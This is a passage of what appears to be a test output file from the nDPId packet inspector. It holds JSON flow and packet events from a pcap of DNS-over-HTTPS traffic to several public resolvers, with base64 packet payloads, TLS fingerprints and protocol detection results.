{"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+04538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":946739603346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3068,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3068,"pkt_l4_len":3034,"thread_ts_msec":946739603346,"pkt":"ZmZmZmZmRERERERECABFAAvuVbVAADsGC4YJCQkKCgAAAQG7yobBes1eOpk9D1AYAHferwAAFgMDAHoCAAB2AwPPxPF58rRx8NlAStddGtWmBxk0TsgFRMyjmLE2UJLzOSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHnhMCAAAuACsAAgMEADMAJAAdACAXimL6oC2BgKKkKv2GFQZ0YvKv9UBLIqQLjYesKsDOXxQDAwABARcDAwAgsv\/aMwoaVLJwBsdUrBspRDIe6WOUfDjyPvz9+wtEYK8XAwMKaJbt\/ye5NqlSM6\/tOfe9bC5ygGHuvTHGsEkug50mliwDXC+zbimuaXpevBCVc6v4emlocpuYSolXpHjPLZ5mH\/n\/Wwg\/zT8DKTys1phOBjndqMIJ26DAd1BULzfsS4\/LPzxUrBzIWvX6A2LKLmwvvolWTixlKxXTGAwoKmNpvOmmolp5p0KnP+05uqYpZwQr1eiVG4Jbxo4RKPp2m5qudj526IfaIUxv6TymwnkyKidb8KJ7fECEEmqDTEJYi3AMqq0F6jVWm4S\/Cw3xWxFHQLXfbhWl\/xQNbH7sQr1+VP1aT1KVnkPOnmrjsvXKtU37nhtNVagiwB4tTsa0XjgxO6nNrduMisjiP1kYOcjiQ52IvQ8yUcLxoVZvs66brT2XF4X+BUOjv0f2D+iKuSPPaodKDokIKfB3EFHwrxtXROObndCkt2l8uoO\/YFwn4AVaivPS7QA9y1ZB5oLifA+q5b\/fsbKJUohIzT23SgYvI1FZi9km+tWoalj+0eMzm2XcwysPa97vGSKpeXtbzhnBE6t0DL+SCNAkdyN9iZf+SkkYuc1rpy8H6FsnB0MNHcLT\/7h9UpysD4zCa5uCyld0qhDdV3MzU7a7heBLLZvpkeoMCMY0KW7Nghl3Tf2jMPhPpMXgWhDsiEqTDOOStqJ6ji5D3nXcz67NA7onASlOfxCYNM8r0u017+zZIe1OE+PpBYW8chi30ujo48vE+6Zr1LXdzMZq7SQ9KcvNds70bZNXXOxSMjMXLVZIXnbsRiW02iiUe4S1V8qA1xoY+tL3PM\/3KBP4ZSUn0i9oU0Zm0bhbtwOS\/9R3KZPgmCI+1g7zZ+sqsIKC0g2uvkEsdNIqhrXU224qW6xxP\/j7fBBrVPw5fuLCU7p8+Yh1Cpxk4zFmUhl0XbcAlqLu7rHI4fQoDUdIgemBLeSEl1+Y\/z6KYsqD8NYrgKAvSsbZ1H\/Vdb3V1ajFVEUtmvJbvjf\/83uaxbTgecYPCPp7fDTlwk8SSHepVo8KtWsduLEs3DxEjvauvr9rL7FbVuDjSA3SeEqhFhGtSYJioWjgprG3WdpQzYP52GvnOKwXu7vjaJad3BS\/DxKTEtPTMDE4Fp6cDirnN3wrVazuNyc6gO+xpNalCZ8Rd4w5DmHczo4DwVyfZ9Fxz7k2fB4TnNz9ILT10qjnOlN\/ksy+JVVDJTTX6v+Ua3SCh6Bynhcuz7SktArn4gMoxcY2E4z4hIcGQHNkb+py02aK7EHGVgPR74HZosi0lhtUl4dpwbcfDHkQU+oVloy53
x1IxuauA66S2qPneNDmRr8rKf9GU\/LJH2dezQ+WudmVZtgHXrLWtjuFmnH7eaBODVb8UwsA0Ge9wdJPfbyaGd7iLOv94vz10GXsEVy\/CXkZZhekrbvjToLvfDqaRAilCzMBHwybWhwwRUQsUh\/rPF7FXEJaXHA+eAZPWEuEetxByN3cFbJKFAiJ4IoKIRBIkGZxaTOcLn\/+XdFg3+W\/lMlmaqOUp903NihM97Rw4Bpqxex1vlYSLEh1ll9uJAf5iJVYMcmiqcaYXWfQOEXWR1wEE7wZE1+wo9+np3wP\/ty0jb3vy8+oqDWA8OdUjkdhqeUyfjZfa6t7pr4ITQpHLy0bNHsZ48wim0yu3Y7a6artue3kmQYcW2RckDOWxjAYg9ikO\/kwS062tZFHnT2VanvAd16qor00inyMS9VT8p\/085mt8kQkGSG0rip8q4xWZYbMFCfcEVkD4E5q7utpFEDkZ964uRE2Vw1PzBHn62rcmtvUqQaoGAFjFlHLMS40f9r+HKG7wRWTWQ29d16NsH+Xu0qXRhzWgjImijKWlv6KBGT1Cxynn\/KrehvF0361FyBUkJo1S1Ztxsubdf3ddeGeEr99d5oc\/xgpXMAl6ZIfUBPJjnOeC932\/TOOjMzG7PhOgunB+ggqQ5LQc0CX3c5BLlJtBtobycDsl7t\/eLrX\/bMfWq1dBy8SxYnEvGbNHrForDiuOA\/0lI3GVO62V5P1dM2BK8fdHneO0FhK969xszY4KacAP0CD5Aah0NJ2dzSGVZQtRmv\/TuFZlUQB3cFfHJYpNMU\/sn32bfB7GWJI2MhPEITiLal7HIPxgTikeJcDL13qUn7bk19T+rXcadCGiBoKDb40Dx6ogDfm4H0pA9C7OZJC0LRf01KZZRBjQs4x5ewT+p6+Og3SFrrTJ8ObJe\/TFocDQSMCBCWHQJqFicRtnWl4mmw+qTCsSoZQ\/ibkZFi+igS4TWV+31tPjazydJfOrW9xLZSgCilkMeJWYl8vH1ijLI+xCM8xxlQj5svlwHqvt+EkteECF3EKEt55AWpnRTNzzJivCSHy2gGPxW5UKKBkiSUoPFh0qyVjKN5HqDcW5MrFR2HpLqhuRbEXoannFiepiMp6aCVRMgYzvmQIyFH17\/3pokulHalnqX0gFQkjPqUPYf6B8\/o0H5LL0kahUiyL+d6BqSr8d42vsjYrpSfDaIcCW+FFGcj\/61Y6Fdihg57b1nq47mVWBJ9vcfq6xagmjwoJrNbwHaDS0XVSxL6y45zWrDfovrm0VvelVEdjwsn0FcoL6zZxDjjOt0EJP+OSVXcMeuY7uIG+KTnnHoV0vMvgMsIMiJbtYXgvda9zrqGty0FDqsOWmIdUCMf7t9LcgXTVP1POJeyDb0J4B38BTX3wUkWV7Ddf9ih9u7A\/m95uqIUbBJE2UeEbEEHif0BvcJl8E3UGeXVNiKRj7lxmplRVER7ystoW7OIAwNXC3MbNiwrjMNGlyZxeIZvGJIjHlQuApwLZsjzZzABT3\/zDbS43YjZzqyO21cEI3xf5DfWK6ZyU3Gjytb2PX5Te\/wOkKfusuGJNyYU73DNCw6\/IA2qWOmaw7\/mXzErXE2WxarQFcAU6el9VnuyWPJs57xlszen8XWYD0zQcAkiZ9pBOymEDFngWCP8+c+AEG42RtW8heXsNn6Oe2ZAWO\/0AXBzQr+rO1qlWDZzv3V7XELPKS49M71P\/6XXdYRKeCeHIn9vIc91j0OnL7GZzEPRVrpELGmw5rN7x6AqDoK3g\/LGcF47Fu59pwNqH3h40OLoshBk76izruGCqusL4Ms6YFarwUJkiUBlvhjjR7yHu721yX53PmlJXwCPueaRMxPhyJUl4AErQ3xPn5KAYXOjk3\/LnBLmSDl4f8PDkxmKUVaitsKqWvpl1TTX0fA2ZAqmTFey5ifEjBKLesy4caeyeCMEZZjMOhPX9MKfIEGous6l
HCaZSQQHUSMY1BTylXmW622\/10lQS8aN1mce++r7\/TAswiTbum59NRH+1WXDpTaq5aRBgs7Pc6pr4lABNwxmieRHx0ER8V5gmxNVB9ACpzjEkp28DmYAH1\/iiBQfjkW2oblAVhUqcezWZUUEbpTbTAEj81Dzg+Fe2EsJFV2MiLhqH0ZMEkKY9oMnGyGvqY11wK7Qf4HXmtakoM3CF+wPbb9he7ffoRbYXCwbxTcDrBSEJdjOMhsSClbW03C9LGM4s6RAprMpnuw2wArtlzcr4bo701pOupS\/tdL5NkaZ2ZzsCChcDAwBgOnNpVcvc5YFZ3YuA8YRoqsuLDn4GImAnVqFIX3IzoTnZe29KOqUXQC0V61jJdr5Jnb3k3MOCdTH2u+HBBkKmYvlFb8GpDbcgObm2pFs9vNSY1WNyfnlLuFSQCBkHWe0UFwMDAEV7D2ZJm3CG6uFedmkozBwacoDrnHkQN6RCxC8K2l8lcKCSu3Q0j3XFRWsykB64fgtOqxtlPlxXpmtKrFqiyWDCeX9Q+Jw="} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739603327,"flow_last_seen":946739603346,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":3299,"flow_avg_l4_payload_len":1649,"midstream":1,"thread_ts_msec":946739603346,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":946739603374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739603374,"pkt":"REREREREZmZmZmZmCABFAAB4XkhAAKYGo2gKAAABCQkJCsqGAbs6mT0PwXrZJFAYAfXTOQAAFAMDAAEBFwMDAEXJf2y8xWhMhAZA2WXz9agwI9f91RKP49sWLlsKAqD2Anz18+mnUXeRrd7MefwrF\/wulkzvUzp\/PNHsE\/j94eCMWT0CzeI="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946739661512,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739661512,"pkt":"REREREREZmZmZmZmCABFAAFFx6JAAK8GN2cKAAABuetRAa6gAbuz5lknlG0\/21AYAfbM4AAAFgMBARgBAAEUAwMfgFJ2Kafn6OC8bsQNsKFbNXsDyxgypaGgbuYoVgNdqiAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIIH2RRfX3PNaXYMOoXj3ynNGqfHChI6\/gAXerDGvzggi"} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+04683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946739661535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739661535,"pkt":"ZmZmZmZmRERERERECABFAAxS7o9AADQGgG2561EBCgAAAQG7rqCUbT\/bs+ZaRFAYA+rX7QAAFgMDAHoCAAB2AwOIv9853ekbZoNmLmgcqNPyyS1j9KmZm6LL1EB3x+W+MyAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3BMCAAAuACsAAgMEADMAJAAdACD6x6OWYowjGpQ7hpL1\/XAvKAPz7Qey4KV7v02zhqXZdBQDAwABARcDAwAgyc0HM+W8H8TE3DEJWTZrLIbavzRZjtX85L8RdcWlDvUXAwMKE3Ep4ySuvwn1mgGngq567huqNt4kq0krhrI\/h93Xu5m86O9X2PLgikjAQ\/f9b0D4TlJnxV9cGU04GfVlCuVdBuDl1OIowNDzv97yB1hnS\/nmnSeVxy1F8D7\/C2lvCqf2cxAVE09ueyG1Z8bXZ2QECTYKbWaJhHhH3grXMLxM9TK7dwfYp5ry3mgBLj8Im1sBBtK1ijR5DOPlXD4i38GWBdXuEFX66BB\/RJoRwVEIncNbQelSZeCqjUb3u++TUwMNQylDBUpnEAe47WxBvCiB3j4t00aQSmqM0TAluU8dwn7tiUiJEwAYZgDG8XeCA2d8CwkyaaNUs0P3Rp5Ub77dFKLlWkM7Ox84gnAyRhVMHCmMumYMkWKlAivuj\/eXgWwWByB6smKGxdGHvMorcYTbQq9mZYmNNNkDPDaVaw5533PFvpx4ba99q1b36RpLWXBUvp3e8mh0pBow5UcR930tP8k9y3Mp\/Hul\/USMW6fOtKvrODulyByiQtZSjqe6z4\/9jz9br68\/R0pBmxYIdiwDh9sAHDejB9VSYvk7ssbBQpn+Jgwnz6Ryy+sDgPoInVRafSLVQ2XaqYm5f6C0Jwzhr6UtNZ4\/zNTcpzOWnfrCB0SA4OuUkh\/XzE\/16DFk8ZQDliBoueyPhn8cEizoLe43IQ4BRx1FGhFopJsvL2cINLJIZh8DTM\/8W7f\/ASccXTbKN3NreGL2zPJ9HkyArzmAuS0H6AWBUpZyjU0X4LPypLaoIp74s3Z6LMGrDv+Q9HPcSM3AsvYaPpVMikXZgrncjZjmSO3nKjVK7tuPHzmBxV2ASbUY9dkYy7qS1LbwD5HCaZkMJLquTC43\/zrZa9Cf+VJlQO+7\/bTkI19jV7MBsNxvCJS3vho32OcNSgskst5WCDisQYxOEJ7yIiJ4Qj131r3komITCdIi6sfPNECBD925ao9iSOw1a3NghVbKi1Ke9+osy6p4OIfl7R\/jJIRkFpjTHB9lrhuKyd3x90HahF\/Bgrc+0OPDW3df50BV25QUTv0YHg583iZZwuimhgpeeN8oRbZn4Oz1sb61wMILMVA1YkIFgELm6QWH0EjBDa5PcdPXwcXSRAXJR2\/zX8giHU9oVoqfNaIjA+SmyaolS9o0C9Gxx9xhkTFg+SAbN3Goh5osUJrTzgif84rF3v\/clkf8\/ZhPyDROa9H0yWh+TK3VY9NLRXxv12lS5FZMqutTNAtmppSaz1n5imbXVp1Da9\/rGuGJgyHbUPRjpcY\/qQ4nrdYPUt0lBpjbxyw
R21B5bH94VrAutoZgT1NlpA1fjy8uX6CC\/PzzpWgwoLz2\/ah06JLAEuj5ndY\/3P\/Cea86JZSQRIAOkxHfXLLrlrueGx1dvDahl9VAk02WVblMiy86oo72YX2jdNNf7IRMOaPtI08s6slCfPDpn3bANNyLKCX6T8oskMhdiK\/HIjCb1KyAdgQ2+yLvi3d+MuMeWmC07amcrbn+OTYQQNPWx6i\/o5VJfAp896EdOSd0n7JnPYzTA1M2RyiA5D2thGuZ18x5oW4andkKefpZLKocbhraKqdRDR2qHe1UOjP7ac97YdAdmgxzkuJnD41fZ8SEi5Zg3NfdmEEfpkvRjC5orTLd0fIsx5c1+XLU\/R3b4bQM96DkiRuZJ1NUlIhf9JvTA7QhsNS9Evhm+KxSrzo4fPncRHMt8lm5+VkFq5jZsS\/4aS9tmtMGO7fcr\/LpSveCPtAloCQrU+vhpaXaC4\/SCuRji5PdK182R618OsLro46yH5FqoSw3EFuupxW4KHdDcJyAmbvTP3RLz1SxCnflYoAqTczyrDRGBg9\/VwVoEVI1F90s2UJwdF3wAnZAvtsFo0aX7P\/QLLigT0+21EtehOsx99nALYpQP+Wes4pdBUuuM1hrGs4phO3GFIyYVSCdORl3bwKcDgUn6jxeA5jLALqAkUQz6oQZAw+UAmaFT7liB5ZMHspe2Nk5qb3bDaj1FmXHIWt\/85M5M02qebtth3yNCkr6Yp8QH7DkvUBEcBvugZfGdO8uohym\/eNU58r4tZ+dX\/tuHtfYu\/HTthyF6zJIA5NCwZI8ZPOa0Ik2ZVHuDdccBZzRFIr6iS6N658h5UD2w34\/Zc25OfWHIIyNU8f8\/IYCk9XVJNve0Okk42KtkEZEvU5b0G1QgC8PnK8r+XSR+vGYlx30IHhP0Drstay6UqCpdjb38zyt16Qx9KI1K78\/2x0ZLR7g9lNe5aJSm2DGdBsBLk1r5a74FD95UK8Adgld6WS3J1isO2nKe9Xs1y3yG0BHL6PVzcVJ6xLZkhyj81HERDbvsw89dCQ0RJq5YmEae+boIDnKyAnLYzUgmbMRlc1g8JOgQmr6\/NRcNQVzPj9Tmr7h+4nauDzZ0EwSB6bpnhekE6zTzsN8ksFy6WPV1V2TWaFMCxIJpm4tqxJloTCvFyT3CBtW57hPqqD33WSzMFQ4mYuH5Kgu\/JydyuTxbX33iR4YxYd7QhqiqEqf7Z40jPc99ZwAIj52PTzQ7U+ojkqP4MuUynWiVDvS\/8M2\/Vvth6PA4ClC+NG9V0jqT2CwEy0LU0ERe0qEd656+zZx\/fgC3xfIuWV0svyqgeH7U8anrlDCpp7N40O2SWqb3L3JMSf4o49g5Y7jySS1fW2+m5VjaQqCccoq+\/wn0QIhjH7Xd2oER1gcyADsjGJt5aqBudWst9NAdC7\/E6mgwXOhZmtXb1lcPmN1A3ldDXRkgXTncFzTkiGIgqqygowkLd1h\/u0K8p6hXN6SporJbwLrTenWrNDIG63gFBLm2D7U+S642eghPumVgo7B1N6elGvUpSDX3m8qB6zRisoSKoWKWO5xgUo0OWMndotDAaZPAq3bhL2Pxzdl9WOKnnP6NOK4+F4BC3OgZgYIEUhrknbM3wBtdHfsfGuj0RFj5lNw2AlFe8pNBDRkjYdmUdc0f\/vnWwnfo22NWKX1BdiVu7196lmWb3TQ4gFhlK81yNy7eFJuFbgrYZ5PUlfjIwTDgxIXshraxns8270zwqor2u3QZYQoN4I1EUcEja7lh2qdAWxfca\/zxpKtNeCFUm8zfvAy2hjwmAqVnw7n4Et+Xyf9ksFEQ4\/qzsOHpBM0zGs5xxH5dXSgC84hPug8TuHm5XeS02QK5ivwcMFrRGIBts0M6ytr6tm6t5af5Z2U58e0QlvyTSXCPiJUK3gUQUYViS\/IjXLR2ycg4306mXwXdbQ8v7MG8Jbo+42mtOwsAND+
01bl1fOhl5IjO\/hKWjGNBJndlQaRfYzoY1bNcjrUVpsWniWOjJBYJ9yapHVp6DQ0QxTAp4enh41yjjXkuC9cO0IfBYAr0q3doev3F6MDmfD3QC30o0nnTuJKglBmQmNqmFF98Ioa6LYtVQSVj9fT7Jq0Jj7\/w6McuInFQUSdd3NIs7zDF4f1McMigXXd3svv1byyFwMDARmEZ3FvSkJXAws42ybGrYb\/Ga9WUTit+emudCQdO3qxSLRL9Xz90Zj\/0AIfatwlfnnVgLFc5QxTIdMvpyCnIjSAcDaEJvu6yM03S3K45PurYyNI6VNrD8T3C7JZ2oGRKr9xNDuiMdmtC9\/9YGpIp8JcXSnnpIql+dalqpwG9n50trcQI0C4J+hm1Yu6USN4wzVC+tr3gsW6PyyDAAs17vVbo+Scs5p00FZ1o\/rHfMtLfFwh8MAYWoGvtptGh9N2zS+PrJ1tBcSPIWnstLtsnAnrYxfC9FGgvCH\/DigiWfhGZwyoa504FzWxS6CzOvDPhsC522yXw\/\/MDJuJbpdH1g+oBnB701N1aymW+zBchXMoA1YOfcUScPREsxcDAwBF82UTEIbXenVn7eF73krbJp8pjxkB3FH+h3306Rr5JIHM3AbirkPdWnHupm94YxIhIDqYUbC9YcWD3w0dLlmwNJiAVT\/+"} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739661512,"flow_last_seen":946739661535,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739661535,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":946739661537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739661537,"pkt":"REREREREZmZmZmZmCABFAAB4x6RAAK8GODIKAAABuetRAa6gAbuz5lpElG1MBVAYAfXMEwAAFAMDAAEBFwMDAEU4SkGRhTVOzjkja1xO2w+N\/vz+OkRmcdhLqaqpXQNb6A6SRcM4Xi9F7CyJ7zWjY541e0wZEZOfbwCMOI4VGHKGlHVB\/Ow="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946739879619,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739879619,"pkt":"REREREREZmZmZmZmCABFAAFIcKVAAGQGIToKAAAB0frxGYueAbsFpAMoj2Q4kFAYAfaFCwAAFgMBARsBAAEXAwNRmx2nSkx+6m6KcnM1jGr2d9+E6hEUWeU+Rct80JF14yBFUW7fbN2m28L3JLX9K8uSgoBCeEP2oBBIn6aFnchRZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILzmWxHpwarRt4Ej829OBgtUnpC5uzX3e58yGu+riJtB"} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+03223{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946739879647,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAgoIhBAADcGle\/R+vEZCgAAAQG7i56PZDiQBaQESFAYAfWL6wAAFgMDAGYCAABiAwOvuIoBv9aLdY9+pRuVYLTvaIEBB5j8JJqoUP\/T+o4DJyAaq0H4FgIYS60khmCU6D9TGVas7XFToGUgExNzFU9aPcAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4